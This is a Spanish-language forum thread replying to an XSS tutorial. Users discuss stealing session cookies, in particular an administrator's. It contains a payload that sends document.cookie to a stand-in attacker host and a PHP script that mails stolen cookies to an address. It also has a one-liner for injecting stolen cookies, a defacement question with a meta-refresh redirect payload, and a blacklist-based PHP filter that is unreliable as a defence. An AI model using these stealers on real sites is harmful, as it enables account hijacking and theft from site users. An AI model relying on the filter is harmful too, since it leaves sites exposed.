[::Tutorial::] - Ataques XSS

Iniciado por Rentero, 24 Mayo 2004, 03:49 AM

0 Miembros y 1 Visitante están viendo este tema.

Ch@CaL

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?
Ch@CaL

|Azrack|

y si yo le paaso solo el enlace:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?

security


Dr. Stephen Falken

A día de hoy esta vulnerabilidad está casi capada. No?

NaphacK

Cita de: Dr. Stephen Falken en  9 Enero 2008, 19:46 PM
A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables...
Aunque tengo una duda...
Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
Saludos...
;) ;) ;)

merinodaniel

hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

<?php
     $cookie 
$_GET["cookie"];
     
mail("admin@gensale.net""Cookie stealer report"$cookie);
?>


este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes

R007h


sirdarckcat

usa este:
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});

slackbyte

Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">

y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.

KarlosVid(ÊÇ)

Este es el Codigo permite proteger ataques xss  :rolleyes:


<?php 
function xss($val) {
$patron '[ ]+';
$valereg_replace($patron,' '$val);

$patron '[ ]*>';
$valereg_replace($patron,'>'$val);

$a=array('xml','script''applet','embed','iframe','frame''frameset','ilayer');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
$tag='<'.$a[$i];
if(strpos($val,$tag)!==false){
$patron $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>';
$valeregi_replace($patron,''$val);
}
}

$a=array('link','meta','base');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,'<'.$a[$i])!==false){
$valstr_ireplace('<'.$a[$i],'<x',$val);
}
}

$a=array('onabort''onactivate''onafterprint''onafterupdate''onbeforeactivate''onbeforecopy''onbeforecut''onbeforedeactivate''onbeforeeditfocus''onbeforepaste''onbeforeprint''onbeforeunload''onbeforeupdate''onblur''onbounce''oncellchange''onchange''onclick''oncontextmenu''oncontrolselect''oncopy''oncut''ondataavailable''ondatasetchanged''ondatasetcomplete''ondblclick''ondeactivate''ondrag''ondragend''ondragenter''ondragleave''ondragover''ondragstart''ondrop''onerror''onerrorupdate''onfilterchange''onfinish''onfocus''onfocusin''onfocusout''onhelp''onkeydown''onkeypress''onkeyup''onlayoutcomplete''onload''onlosecapture''onmousedown''onmouseenter''onmouseleave''onmousemove''onmouseout''onmouseover''onmouseup''onmousewheel''onmove''onmoveend''onmovestart''onpaste''onpropertychange''onreadystatechange''onreset''onresize''onresizeend''onresizestart''onrowenter''onrowexit''onrowsdelete''onrowsinserted''onscroll''onselect''onselectionchange''onselectstart''onstart''onstop''onsubmit''onunload','http-equiv','content','charset');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,$a[$i].'=')!==false){
$valstr_ireplace($a[$i].'=','',$val);
}
}
return $val;
}

?>




:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::

-->